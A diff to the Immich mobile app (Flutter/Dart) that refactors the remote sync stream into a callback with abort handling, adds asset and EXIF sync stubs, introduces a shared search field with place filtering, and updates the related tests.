|
||||||
final parts = previousChunk.toString().split('\n');
|
final parts = previousChunk.toString().split('\n');
|
||||||
previousChunk = parts.removeLast();
|
previousChunk = parts.removeLast();
|
||||||
lines.addAll(parts);
|
lines.addAll(parts);
|
||||||
|
|
||||||
if (lines.length < _batchSize) {
|
if (lines.length < batchSize) {
|
||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
|
|
||||||
yield _parseSyncResponse(lines);
|
await onData(_parseLines(lines), abort);
|
||||||
lines.clear();
|
lines.clear();
|
||||||
}
|
}
|
||||||
} finally {
|
|
||||||
if (lines.isNotEmpty) {
|
if (lines.isNotEmpty && !shouldAbort) {
|
||||||
yield _parseSyncResponse(lines);
|
await onData(_parseLines(lines), abort);
|
||||||
}
|
}
|
||||||
|
} catch (error, stack) {
|
||||||
|
_logger.severe("error processing stream", error, stack);
|
||||||
|
return Future.error(error, stack);
|
||||||
|
} finally {
|
||||||
client.close();
|
client.close();
|
||||||
}
|
}
|
||||||
|
stopwatch.stop();
|
||||||
|
_logger
|
||||||
|
.info("Remote Sync completed in ${stopwatch.elapsed.inMilliseconds}ms");
|
||||||
}
|
}
|
||||||
|
|
||||||
List<SyncEvent> _parseSyncResponse(List<String> lines) {
|
List<SyncEvent> _parseLines(List<String> lines) {
|
||||||
final List<SyncEvent> data = [];
|
final List<SyncEvent> data = [];
|
||||||
|
|
||||||
for (final line in lines) {
|
for (final line in lines) {
|
||||||
@ -110,4 +139,10 @@ const _kResponseMap = <SyncEntityType, Function(dynamic)>{
|
|||||||
SyncEntityType.userDeleteV1: SyncUserDeleteV1.fromJson,
|
SyncEntityType.userDeleteV1: SyncUserDeleteV1.fromJson,
|
||||||
SyncEntityType.partnerV1: SyncPartnerV1.fromJson,
|
SyncEntityType.partnerV1: SyncPartnerV1.fromJson,
|
||||||
SyncEntityType.partnerDeleteV1: SyncPartnerDeleteV1.fromJson,
|
SyncEntityType.partnerDeleteV1: SyncPartnerDeleteV1.fromJson,
|
||||||
|
SyncEntityType.assetV1: SyncAssetV1.fromJson,
|
||||||
|
SyncEntityType.assetDeleteV1: SyncAssetDeleteV1.fromJson,
|
||||||
|
SyncEntityType.assetExifV1: SyncAssetExifV1.fromJson,
|
||||||
|
SyncEntityType.partnerAssetV1: SyncAssetV1.fromJson,
|
||||||
|
SyncEntityType.partnerAssetDeleteV1: SyncAssetDeleteV1.fromJson,
|
||||||
|
SyncEntityType.partnerAssetExifV1: SyncAssetExifV1.fromJson,
|
||||||
};
|
};
|
||||||
|
@ -1,4 +1,5 @@
|
|||||||
import 'package:drift/drift.dart';
|
import 'package:drift/drift.dart';
|
||||||
|
import 'package:flutter/foundation.dart';
|
||||||
import 'package:immich_mobile/domain/interfaces/sync_stream.interface.dart';
|
import 'package:immich_mobile/domain/interfaces/sync_stream.interface.dart';
|
||||||
import 'package:immich_mobile/extensions/string_extensions.dart';
|
import 'package:immich_mobile/extensions/string_extensions.dart';
|
||||||
import 'package:immich_mobile/infrastructure/entities/partner.entity.drift.dart';
|
import 'package:immich_mobile/infrastructure/entities/partner.entity.drift.dart';
|
||||||
@ -15,7 +16,7 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
|
|||||||
DriftSyncStreamRepository(super.db) : _db = db;
|
DriftSyncStreamRepository(super.db) : _db = db;
|
||||||
|
|
||||||
@override
|
@override
|
||||||
Future<bool> deleteUsersV1(Iterable<SyncUserDeleteV1> data) async {
|
Future<void> deleteUsersV1(Iterable<SyncUserDeleteV1> data) async {
|
||||||
try {
|
try {
|
||||||
await _db.batch((batch) {
|
await _db.batch((batch) {
|
||||||
for (final user in data) {
|
for (final user in data) {
|
||||||
@ -25,15 +26,14 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
|
|||||||
);
|
);
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
return true;
|
} catch (error, stack) {
|
||||||
} catch (e, s) {
|
_logger.severe('Error while processing SyncUserDeleteV1', error, stack);
|
||||||
_logger.severe('Error while processing SyncUserDeleteV1', e, s);
|
rethrow;
|
||||||
return false;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@override
|
@override
|
||||||
Future<bool> updateUsersV1(Iterable<SyncUserV1> data) async {
|
Future<void> updateUsersV1(Iterable<SyncUserV1> data) async {
|
||||||
try {
|
try {
|
||||||
await _db.batch((batch) {
|
await _db.batch((batch) {
|
||||||
for (final user in data) {
|
for (final user in data) {
|
||||||
@ -49,15 +49,14 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
|
|||||||
);
|
);
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
return true;
|
} catch (error, stack) {
|
||||||
} catch (e, s) {
|
_logger.severe('Error while processing SyncUserV1', error, stack);
|
||||||
_logger.severe('Error while processing SyncUserV1', e, s);
|
rethrow;
|
||||||
return false;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@override
|
@override
|
||||||
Future<bool> deletePartnerV1(Iterable<SyncPartnerDeleteV1> data) async {
|
Future<void> deletePartnerV1(Iterable<SyncPartnerDeleteV1> data) async {
|
||||||
try {
|
try {
|
||||||
await _db.batch((batch) {
|
await _db.batch((batch) {
|
||||||
for (final partner in data) {
|
for (final partner in data) {
|
||||||
@ -70,15 +69,14 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
|
|||||||
);
|
);
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
return true;
|
|
||||||
} catch (e, s) {
|
} catch (e, s) {
|
||||||
_logger.severe('Error while processing SyncPartnerDeleteV1', e, s);
|
_logger.severe('Error while processing SyncPartnerDeleteV1', e, s);
|
||||||
return false;
|
rethrow;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@override
|
@override
|
||||||
Future<bool> updatePartnerV1(Iterable<SyncPartnerV1> data) async {
|
Future<void> updatePartnerV1(Iterable<SyncPartnerV1> data) async {
|
||||||
try {
|
try {
|
||||||
await _db.batch((batch) {
|
await _db.batch((batch) {
|
||||||
for (final partner in data) {
|
for (final partner in data) {
|
||||||
@ -95,10 +93,42 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
|
|||||||
);
|
);
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
return true;
|
|
||||||
} catch (e, s) {
|
} catch (e, s) {
|
||||||
_logger.severe('Error while processing SyncPartnerV1', e, s);
|
_logger.severe('Error while processing SyncPartnerV1', e, s);
|
||||||
return false;
|
rethrow;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Assets
|
||||||
|
@override
|
||||||
|
Future<void> updateAssetsV1(Iterable<SyncAssetV1> data) async {
|
||||||
|
debugPrint("updateAssetsV1 - ${data.length}");
|
||||||
|
}
|
||||||
|
|
||||||
|
@override
|
||||||
|
Future<void> deleteAssetsV1(Iterable<SyncAssetDeleteV1> data) async {
|
||||||
|
debugPrint("deleteAssetsV1 - ${data.length}");
|
||||||
|
}
|
||||||
|
|
||||||
|
// Partner Assets
|
||||||
|
@override
|
||||||
|
Future<void> updatePartnerAssetsV1(Iterable<SyncAssetV1> data) async {
|
||||||
|
debugPrint("updatePartnerAssetsV1 - ${data.length}");
|
||||||
|
}
|
||||||
|
|
||||||
|
@override
|
||||||
|
Future<void> deletePartnerAssetsV1(Iterable<SyncAssetDeleteV1> data) async {
|
||||||
|
debugPrint("deletePartnerAssetsV1 - ${data.length}");
|
||||||
|
}
|
||||||
|
|
||||||
|
// EXIF
|
||||||
|
@override
|
||||||
|
Future<void> updateAssetsExifV1(Iterable<SyncAssetExifV1> data) async {
|
||||||
|
debugPrint("updateAssetsExifV1 - ${data.length}");
|
||||||
|
}
|
||||||
|
|
||||||
|
@override
|
||||||
|
Future<void> updatePartnerAssetsExifV1(Iterable<SyncAssetExifV1> data) async {
|
||||||
|
debugPrint("updatePartnerAssetsExifV1 - ${data.length}");
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
@ -4,11 +4,11 @@ import 'package:flutter/material.dart';
|
|||||||
import 'package:flutter_hooks/flutter_hooks.dart';
|
import 'package:flutter_hooks/flutter_hooks.dart';
|
||||||
import 'package:hooks_riverpod/hooks_riverpod.dart';
|
import 'package:hooks_riverpod/hooks_riverpod.dart';
|
||||||
import 'package:immich_mobile/extensions/build_context_extensions.dart';
|
import 'package:immich_mobile/extensions/build_context_extensions.dart';
|
||||||
import 'package:immich_mobile/extensions/theme_extensions.dart';
|
|
||||||
import 'package:immich_mobile/providers/search/people.provider.dart';
|
import 'package:immich_mobile/providers/search/people.provider.dart';
|
||||||
import 'package:immich_mobile/routing/router.dart';
|
import 'package:immich_mobile/routing/router.dart';
|
||||||
import 'package:immich_mobile/services/api.service.dart';
|
import 'package:immich_mobile/services/api.service.dart';
|
||||||
import 'package:immich_mobile/utils/image_url_builder.dart';
|
import 'package:immich_mobile/utils/image_url_builder.dart';
|
||||||
|
import 'package:immich_mobile/widgets/common/search_field.dart';
|
||||||
import 'package:immich_mobile/widgets/search/person_name_edit_form.dart';
|
import 'package:immich_mobile/widgets/search/person_name_edit_form.dart';
|
||||||
|
|
||||||
@RoutePage()
|
@RoutePage()
|
||||||
@ -42,47 +42,12 @@ class PeopleCollectionPage extends HookConsumerWidget {
|
|||||||
appBar: AppBar(
|
appBar: AppBar(
|
||||||
automaticallyImplyLeading: search.value == null,
|
automaticallyImplyLeading: search.value == null,
|
||||||
title: search.value != null
|
title: search.value != null
|
||||||
? TextField(
|
? SearchField(
|
||||||
focusNode: formFocus,
|
focusNode: formFocus,
|
||||||
onTapOutside: (_) => formFocus.unfocus(),
|
onTapOutside: (_) => formFocus.unfocus(),
|
||||||
onChanged: (value) => search.value = value,
|
onChanged: (value) => search.value = value,
|
||||||
decoration: InputDecoration(
|
|
||||||
contentPadding: const EdgeInsets.only(left: 24),
|
|
||||||
filled: true,
|
filled: true,
|
||||||
fillColor: context.primaryColor.withValues(alpha: 0.1),
|
|
||||||
hintStyle: context.textTheme.bodyLarge?.copyWith(
|
|
||||||
color: context.themeData.colorScheme.onSurfaceSecondary,
|
|
||||||
),
|
|
||||||
border: OutlineInputBorder(
|
|
||||||
borderRadius: BorderRadius.circular(25),
|
|
||||||
borderSide: BorderSide(
|
|
||||||
color: context.colorScheme.surfaceContainerHighest,
|
|
||||||
),
|
|
||||||
),
|
|
||||||
enabledBorder: OutlineInputBorder(
|
|
||||||
borderRadius: BorderRadius.circular(25),
|
|
||||||
borderSide: BorderSide(
|
|
||||||
color: context.colorScheme.surfaceContainerHighest,
|
|
||||||
),
|
|
||||||
),
|
|
||||||
disabledBorder: OutlineInputBorder(
|
|
||||||
borderRadius: BorderRadius.circular(25),
|
|
||||||
borderSide: BorderSide(
|
|
||||||
color: context.colorScheme.surfaceContainerHighest,
|
|
||||||
),
|
|
||||||
),
|
|
||||||
focusedBorder: OutlineInputBorder(
|
|
||||||
borderRadius: BorderRadius.circular(25),
|
|
||||||
borderSide: BorderSide(
|
|
||||||
color: context.colorScheme.primary.withAlpha(150),
|
|
||||||
),
|
|
||||||
),
|
|
||||||
prefixIcon: Icon(
|
|
||||||
Icons.search_rounded,
|
|
||||||
color: context.colorScheme.primary,
|
|
||||||
),
|
|
||||||
hintText: 'filter_people'.tr(),
|
hintText: 'filter_people'.tr(),
|
||||||
),
|
|
||||||
autofocus: true,
|
autofocus: true,
|
||||||
)
|
)
|
||||||
: Text('people'.tr()),
|
: Text('people'.tr()),
|
||||||
|
@ -2,6 +2,7 @@ import 'package:auto_route/auto_route.dart';
|
|||||||
import 'package:cached_network_image/cached_network_image.dart';
|
import 'package:cached_network_image/cached_network_image.dart';
|
||||||
import 'package:easy_localization/easy_localization.dart';
|
import 'package:easy_localization/easy_localization.dart';
|
||||||
import 'package:flutter/material.dart';
|
import 'package:flutter/material.dart';
|
||||||
|
import 'package:flutter_hooks/flutter_hooks.dart' hide Store;
|
||||||
import 'package:hooks_riverpod/hooks_riverpod.dart';
|
import 'package:hooks_riverpod/hooks_riverpod.dart';
|
||||||
import 'package:immich_mobile/domain/models/store.model.dart';
|
import 'package:immich_mobile/domain/models/store.model.dart';
|
||||||
import 'package:immich_mobile/entities/asset.entity.dart';
|
import 'package:immich_mobile/entities/asset.entity.dart';
|
||||||
@ -12,6 +13,7 @@ import 'package:immich_mobile/pages/common/large_leading_tile.dart';
|
|||||||
import 'package:immich_mobile/providers/search/search_page_state.provider.dart';
|
import 'package:immich_mobile/providers/search/search_page_state.provider.dart';
|
||||||
import 'package:immich_mobile/routing/router.dart';
|
import 'package:immich_mobile/routing/router.dart';
|
||||||
import 'package:immich_mobile/services/api.service.dart';
|
import 'package:immich_mobile/services/api.service.dart';
|
||||||
|
import 'package:immich_mobile/widgets/common/search_field.dart';
|
||||||
import 'package:immich_mobile/widgets/map/map_thumbnail.dart';
|
import 'package:immich_mobile/widgets/map/map_thumbnail.dart';
|
||||||
import 'package:maplibre_gl/maplibre_gl.dart';
|
import 'package:maplibre_gl/maplibre_gl.dart';
|
||||||
|
|
||||||
@ -21,14 +23,35 @@ class PlacesCollectionPage extends HookConsumerWidget {
|
|||||||
@override
|
@override
|
||||||
Widget build(BuildContext context, WidgetRef ref) {
|
Widget build(BuildContext context, WidgetRef ref) {
|
||||||
final places = ref.watch(getAllPlacesProvider);
|
final places = ref.watch(getAllPlacesProvider);
|
||||||
|
final formFocus = useFocusNode();
|
||||||
|
final ValueNotifier<String?> search = useState(null);
|
||||||
|
|
||||||
return Scaffold(
|
return Scaffold(
|
||||||
appBar: AppBar(
|
appBar: AppBar(
|
||||||
title: Text('places'.tr()),
|
automaticallyImplyLeading: search.value == null,
|
||||||
|
title: search.value != null
|
||||||
|
? SearchField(
|
||||||
|
autofocus: true,
|
||||||
|
filled: true,
|
||||||
|
focusNode: formFocus,
|
||||||
|
onChanged: (value) => search.value = value,
|
||||||
|
onTapOutside: (_) => formFocus.unfocus(),
|
||||||
|
hintText: 'filter_places'.tr(),
|
||||||
|
)
|
||||||
|
: Text('places'.tr()),
|
||||||
|
actions: [
|
||||||
|
IconButton(
|
||||||
|
icon: Icon(search.value != null ? Icons.close : Icons.search),
|
||||||
|
onPressed: () {
|
||||||
|
search.value = search.value == null ? '' : null;
|
||||||
|
},
|
||||||
|
),
|
||||||
|
],
|
||||||
),
|
),
|
||||||
body: ListView(
|
body: ListView(
|
||||||
shrinkWrap: true,
|
shrinkWrap: true,
|
||||||
children: [
|
children: [
|
||||||
|
if (search.value == null)
|
||||||
Padding(
|
Padding(
|
||||||
padding: const EdgeInsets.all(16.0),
|
padding: const EdgeInsets.all(16.0),
|
||||||
child: SizedBox(
|
child: SizedBox(
|
||||||
@ -49,6 +72,13 @@ class PlacesCollectionPage extends HookConsumerWidget {
|
|||||||
),
|
),
|
||||||
places.when(
|
places.when(
|
||||||
data: (places) {
|
data: (places) {
|
||||||
|
if (search.value != null) {
|
||||||
|
places = places.where((place) {
|
||||||
|
return place.label
|
||||||
|
.toLowerCase()
|
||||||
|
.contains(search.value!.toLowerCase());
|
||||||
|
}).toList();
|
||||||
|
}
|
||||||
return ListView.builder(
|
return ListView.builder(
|
||||||
shrinkWrap: true,
|
shrinkWrap: true,
|
||||||
physics: const NeverScrollableScrollPhysics(),
|
physics: const NeverScrollableScrollPhysics(),
|
||||||
|
@ -2,7 +2,6 @@ import 'dart:async';
|
|||||||
|
|
||||||
import 'package:auto_route/auto_route.dart';
|
import 'package:auto_route/auto_route.dart';
|
||||||
import 'package:easy_localization/easy_localization.dart';
|
import 'package:easy_localization/easy_localization.dart';
|
||||||
import 'package:flutter/foundation.dart';
|
|
||||||
import 'package:flutter/material.dart';
|
import 'package:flutter/material.dart';
|
||||||
import 'package:flutter_hooks/flutter_hooks.dart';
|
import 'package:flutter_hooks/flutter_hooks.dart';
|
||||||
import 'package:hooks_riverpod/hooks_riverpod.dart';
|
import 'package:hooks_riverpod/hooks_riverpod.dart';
|
||||||
@ -14,7 +13,6 @@ import 'package:immich_mobile/providers/server_info.provider.dart';
|
|||||||
import 'package:immich_mobile/providers/timeline.provider.dart';
|
import 'package:immich_mobile/providers/timeline.provider.dart';
|
||||||
import 'package:immich_mobile/providers/user.provider.dart';
|
import 'package:immich_mobile/providers/user.provider.dart';
|
||||||
import 'package:immich_mobile/providers/websocket.provider.dart';
|
import 'package:immich_mobile/providers/websocket.provider.dart';
|
||||||
import 'package:immich_mobile/routing/router.dart';
|
|
||||||
import 'package:immich_mobile/widgets/asset_grid/multiselect_grid.dart';
|
import 'package:immich_mobile/widgets/asset_grid/multiselect_grid.dart';
|
||||||
import 'package:immich_mobile/widgets/common/immich_app_bar.dart';
|
import 'package:immich_mobile/widgets/common/immich_app_bar.dart';
|
||||||
import 'package:immich_mobile/widgets/common/immich_loading_indicator.dart';
|
import 'package:immich_mobile/widgets/common/immich_loading_indicator.dart';
|
||||||
@ -130,15 +128,7 @@ class PhotosPage extends HookConsumerWidget {
|
|||||||
child: Container(
|
child: Container(
|
||||||
height: kToolbarHeight + context.padding.top,
|
height: kToolbarHeight + context.padding.top,
|
||||||
color: context.themeData.appBarTheme.backgroundColor,
|
color: context.themeData.appBarTheme.backgroundColor,
|
||||||
child: ImmichAppBar(
|
child: const ImmichAppBar(),
|
||||||
actions: [
|
|
||||||
if (kDebugMode)
|
|
||||||
IconButton(
|
|
||||||
icon: const Icon(Icons.science_rounded),
|
|
||||||
onPressed: () => context.pushRoute(const FeatInDevRoute()),
|
|
||||||
),
|
|
||||||
],
|
|
||||||
),
|
|
||||||
),
|
),
|
||||||
),
|
),
|
||||||
],
|
],
|
||||||
|
@ -9,12 +9,12 @@ final _features = [
|
|||||||
_Features(
|
_Features(
|
||||||
name: 'Sync Local',
|
name: 'Sync Local',
|
||||||
icon: Icons.photo_album_rounded,
|
icon: Icons.photo_album_rounded,
|
||||||
onTap: (ref) => ref.read(backgroundSyncProvider).syncDeviceAlbums(),
|
onTap: (ref) => ref.read(backgroundSyncProvider).syncLocal(),
|
||||||
),
|
),
|
||||||
_Features(
|
_Features(
|
||||||
name: 'Sync Remote',
|
name: 'Sync Remote',
|
||||||
icon: Icons.refresh_rounded,
|
icon: Icons.refresh_rounded,
|
||||||
onTap: (ref) => ref.read(backgroundSyncProvider).syncUsers(),
|
onTap: (ref) => ref.read(backgroundSyncProvider).syncRemote(),
|
||||||
),
|
),
|
||||||
];
|
];
|
||||||
|
|
||||||
|
@ -1,5 +1,6 @@
|
|||||||
import 'package:auto_route/auto_route.dart';
|
import 'package:auto_route/auto_route.dart';
|
||||||
import 'package:easy_localization/easy_localization.dart';
|
import 'package:easy_localization/easy_localization.dart';
|
||||||
|
import 'package:flutter/foundation.dart';
|
||||||
import 'package:flutter/material.dart';
|
import 'package:flutter/material.dart';
|
||||||
import 'package:flutter_svg/svg.dart';
|
import 'package:flutter_svg/svg.dart';
|
||||||
import 'package:hooks_riverpod/hooks_riverpod.dart';
|
import 'package:hooks_riverpod/hooks_riverpod.dart';
|
||||||
@ -178,6 +179,12 @@ class ImmichAppBar extends ConsumerWidget implements PreferredSizeWidget {
|
|||||||
child: action,
|
child: action,
|
||||||
),
|
),
|
||||||
),
|
),
|
||||||
|
if (kDebugMode)
|
||||||
|
if (kDebugMode)
|
||||||
|
IconButton(
|
||||||
|
icon: const Icon(Icons.science_rounded),
|
||||||
|
onPressed: () => context.pushRoute(const FeatInDevRoute()),
|
||||||
|
),
|
||||||
if (showUploadButton)
|
if (showUploadButton)
|
||||||
Padding(
|
Padding(
|
||||||
padding: const EdgeInsets.only(right: 20),
|
padding: const EdgeInsets.only(right: 20),
|
||||||
|
@ -2,3 +2,5 @@ import 'package:mocktail/mocktail.dart';
|
|||||||
import 'package:openapi/api.dart';
|
import 'package:openapi/api.dart';
|
||||||
|
|
||||||
class MockAssetsApi extends Mock implements AssetsApi {}
|
class MockAssetsApi extends Mock implements AssetsApi {}
|
||||||
|
|
||||||
|
class MockSyncApi extends Mock implements SyncApi {}
|
||||||
|
@ -73,9 +73,9 @@ void main() {
|
|||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
group('syncAlbums', () {
|
group('sync', () {
|
||||||
test('should return when no albums exist', () async {
|
test('should return when no albums exist', () async {
|
||||||
await sut.syncAlbums();
|
await sut.sync();
|
||||||
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
||||||
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
||||||
.called(1);
|
.called(1);
|
||||||
@ -104,7 +104,7 @@ void main() {
|
|||||||
when(() => mockAlbumMediaRepo.getAssetsForAlbum(deviceAlbums.first.id))
|
when(() => mockAlbumMediaRepo.getAssetsForAlbum(deviceAlbums.first.id))
|
||||||
.thenAnswer((_) async => [LocalAssetStub.image1]);
|
.thenAnswer((_) async => [LocalAssetStub.image1]);
|
||||||
|
|
||||||
await sut.syncAlbums();
|
await sut.sync();
|
||||||
|
|
||||||
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
||||||
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
||||||
@ -127,7 +127,7 @@ void main() {
|
|||||||
when(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
when(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
||||||
.thenAnswer((_) async => dbAlbums);
|
.thenAnswer((_) async => dbAlbums);
|
||||||
|
|
||||||
await sut.syncAlbums();
|
await sut.sync();
|
||||||
|
|
||||||
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
||||||
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
||||||
@ -159,7 +159,7 @@ void main() {
|
|||||||
when(() => mockLocalAlbumRepo.getAssetsForAlbum(commonAlbum.id))
|
when(() => mockLocalAlbumRepo.getAssetsForAlbum(commonAlbum.id))
|
||||||
.thenAnswer((_) async => []); // DB has no assets initially
|
.thenAnswer((_) async => []); // DB has no assets initially
|
||||||
|
|
||||||
await sut.syncAlbums();
|
await sut.sync();
|
||||||
|
|
||||||
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
||||||
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
||||||
@ -206,7 +206,7 @@ void main() {
|
|||||||
when(() => mockAlbumMediaRepo.getAssetsForAlbum(albumToAdd.id))
|
when(() => mockAlbumMediaRepo.getAssetsForAlbum(albumToAdd.id))
|
||||||
.thenAnswer((_) async => [LocalAssetStub.image1]);
|
.thenAnswer((_) async => [LocalAssetStub.image1]);
|
||||||
|
|
||||||
await sut.syncAlbums();
|
await sut.sync();
|
||||||
|
|
||||||
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
||||||
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
|
||||||
@ -239,7 +239,7 @@ void main() {
|
|||||||
when(() => mockAlbumMediaRepo.getAll())
|
when(() => mockAlbumMediaRepo.getAll())
|
||||||
.thenThrow(Exception("Device error"));
|
.thenThrow(Exception("Device error"));
|
||||||
|
|
||||||
await sut.syncAlbums();
|
await sut.sync();
|
||||||
|
|
||||||
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
verify(() => mockAlbumMediaRepo.getAll()).called(1);
|
||||||
verifyNever(
|
verifyNever(
|
||||||
|
@ -1,4 +1,4 @@
|
|||||||
// ignore_for_file: avoid-unnecessary-futures, avoid-async-call-in-sync-function
|
// ignore_for_file: avoid-declaring-call-method, avoid-unnecessary-futures
|
||||||
|
|
||||||
import 'dart:async';
|
import 'dart:async';
|
||||||
|
|
||||||
@ -8,16 +8,22 @@ import 'package:immich_mobile/domain/interfaces/sync_stream.interface.dart';
|
|||||||
import 'package:immich_mobile/domain/models/sync_event.model.dart';
|
import 'package:immich_mobile/domain/models/sync_event.model.dart';
|
||||||
import 'package:immich_mobile/domain/services/sync_stream.service.dart';
|
import 'package:immich_mobile/domain/services/sync_stream.service.dart';
|
||||||
import 'package:mocktail/mocktail.dart';
|
import 'package:mocktail/mocktail.dart';
|
||||||
import 'package:openapi/api.dart';
|
|
||||||
import 'package:worker_manager/worker_manager.dart';
|
|
||||||
|
|
||||||
import '../../fixtures/sync_stream.stub.dart';
|
import '../../fixtures/sync_stream.stub.dart';
|
||||||
import '../../infrastructure/repository.mock.dart';
|
import '../../infrastructure/repository.mock.dart';
|
||||||
|
|
||||||
|
class _AbortCallbackWrapper {
|
||||||
|
const _AbortCallbackWrapper();
|
||||||
|
|
||||||
|
bool call() => false;
|
||||||
|
}
|
||||||
|
|
||||||
|
class _MockAbortCallbackWrapper extends Mock implements _AbortCallbackWrapper {}
|
||||||
|
|
||||||
class _CancellationWrapper {
|
class _CancellationWrapper {
|
||||||
const _CancellationWrapper();
|
const _CancellationWrapper();
|
||||||
|
|
||||||
bool isCancelled() => false;
|
bool call() => false;
|
||||||
}
|
}
|
||||||
|
|
||||||
class _MockCancellationWrapper extends Mock implements _CancellationWrapper {}
|
class _MockCancellationWrapper extends Mock implements _CancellationWrapper {}
|
||||||
@ -26,418 +32,191 @@ void main() {
|
|||||||
late SyncStreamService sut;
|
late SyncStreamService sut;
|
||||||
late ISyncStreamRepository mockSyncStreamRepo;
|
late ISyncStreamRepository mockSyncStreamRepo;
|
||||||
late ISyncApiRepository mockSyncApiRepo;
|
late ISyncApiRepository mockSyncApiRepo;
|
||||||
late StreamController<List<SyncEvent>> streamController;
|
late Function(List<SyncEvent>, Function()) handleEventsCallback;
|
||||||
|
late _MockAbortCallbackWrapper mockAbortCallbackWrapper;
|
||||||
|
|
||||||
successHandler(Invocation _) async => true;
|
successHandler(Invocation _) async => true;
|
||||||
failureHandler(Invocation _) async => false;
|
|
||||||
|
|
||||||
setUp(() {
|
setUp(() {
|
||||||
mockSyncStreamRepo = MockSyncStreamRepository();
|
mockSyncStreamRepo = MockSyncStreamRepository();
|
||||||
mockSyncApiRepo = MockSyncApiRepository();
|
mockSyncApiRepo = MockSyncApiRepository();
|
||||||
streamController = StreamController<List<SyncEvent>>.broadcast();
|
mockAbortCallbackWrapper = _MockAbortCallbackWrapper();
|
||||||
|
|
||||||
|
when(() => mockAbortCallbackWrapper()).thenReturn(false);
|
||||||
|
|
||||||
|
when(() => mockSyncApiRepo.streamChanges(any()))
|
||||||
|
.thenAnswer((invocation) async {
|
||||||
|
// ignore: avoid-unsafe-collection-methods
|
||||||
|
handleEventsCallback = invocation.positionalArguments.first;
|
||||||
|
});
|
||||||
|
|
||||||
|
when(() => mockSyncApiRepo.ack(any())).thenAnswer((_) async => {});
|
||||||
|
|
||||||
|
when(() => mockSyncStreamRepo.updateUsersV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.deleteUsersV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.updatePartnerV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.deletePartnerV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.updateAssetsV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.deleteAssetsV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.updateAssetsExifV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.updatePartnerAssetsV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.deletePartnerAssetsV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
when(() => mockSyncStreamRepo.updatePartnerAssetsExifV1(any()))
|
||||||
|
.thenAnswer(successHandler);
|
||||||
|
|
||||||
sut = SyncStreamService(
|
sut = SyncStreamService(
|
||||||
syncApiRepository: mockSyncApiRepo,
|
syncApiRepository: mockSyncApiRepo,
|
||||||
syncStreamRepository: mockSyncStreamRepo,
|
syncStreamRepository: mockSyncStreamRepo,
|
||||||
);
|
);
|
||||||
|
|
||||||
// Default stream setup - emits one batch and closes
|
|
||||||
when(() => mockSyncApiRepo.getSyncEvents(any()))
|
|
||||||
.thenAnswer((_) => streamController.stream);
|
|
||||||
|
|
||||||
// Default ack setup
|
|
||||||
when(() => mockSyncApiRepo.ack(any())).thenAnswer((_) async => {});
|
|
||||||
|
|
||||||
// Register fallbacks for mocktail verification
|
|
||||||
registerFallbackValue(<SyncUserV1>[]);
|
|
||||||
registerFallbackValue(<SyncPartnerV1>[]);
|
|
||||||
registerFallbackValue(<SyncUserDeleteV1>[]);
|
|
||||||
registerFallbackValue(<SyncPartnerDeleteV1>[]);
|
|
||||||
|
|
||||||
// Default successful repository calls
|
|
||||||
when(() => mockSyncStreamRepo.updateUsersV1(any()))
|
|
||||||
.thenAnswer(successHandler);
|
|
||||||
when(() => mockSyncStreamRepo.deleteUsersV1(any()))
|
|
||||||
